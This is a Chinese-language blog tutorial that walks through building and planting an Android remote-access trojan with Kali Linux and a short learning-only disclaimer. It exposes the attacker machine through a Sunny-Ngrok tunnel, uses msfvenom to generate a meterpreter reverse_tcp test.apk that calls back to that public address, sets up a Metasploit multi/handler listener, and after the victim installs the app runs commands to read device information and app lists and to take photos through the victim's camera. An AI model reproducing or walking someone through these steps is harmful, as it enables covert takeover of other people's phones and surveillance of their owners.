admin管理员组

文章数量:1614268

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!

简介:

Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 

Kali常用配置和基本使用:

  • Kali工具集介绍
  • 修改Kali源和更新软件
  • Kali伪装成win10
  • Kali启动root用户

1.外网步骤思想图

Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成test.apk ----->监听当前Ip是否点击---->目标电脑发送exe---->点击test.apk

1、进入Ngrok网站注册一个用户(Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器)

 ​

 ​

2.下载Kali LInux版本 Sunny-Ngrok内网转发

  1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 

 2. 拖入虚拟器托不进去看上一个教程  解压zip

 ​

3.进入解压好的目录:   报错Tcp就重新去Ngrok重新换一个隧道免费很多人用

./sunny clientid  id  =>隧道id

启动了当前窗口不要关闭

3、MSF生成外网木马

                                                                                      不加Tcp| 端口不然报错

msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk

4、打开msf设置payload,加载攻击模块设置本地IP和监听端口

msfconsole 开启

5.绑定当前端口Ip

  1. use multi/handler 

  2.  set payload android/meterpreter/reverse_tcp

  3. set LHOST 当前Ip Kali

  4. set LPORT 4444

  1. show options (查看IP端口设置情况)

  2. run (开启监听)

 6.等待对方点击test.apk木马病毒

成功就有meterpreter命令行 执行命令即可

sysinfo //查看手机信息
 

 

 app_list //查看手机app信息

 

 

 webcam_snap  //拍照
 

 

保存到此目录

成功拍照。

:我的手机拍照过程有声音,

总结:

就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

监听到信息连接----->成功!!!

本文标签: 系统手机KaliLinuxandroid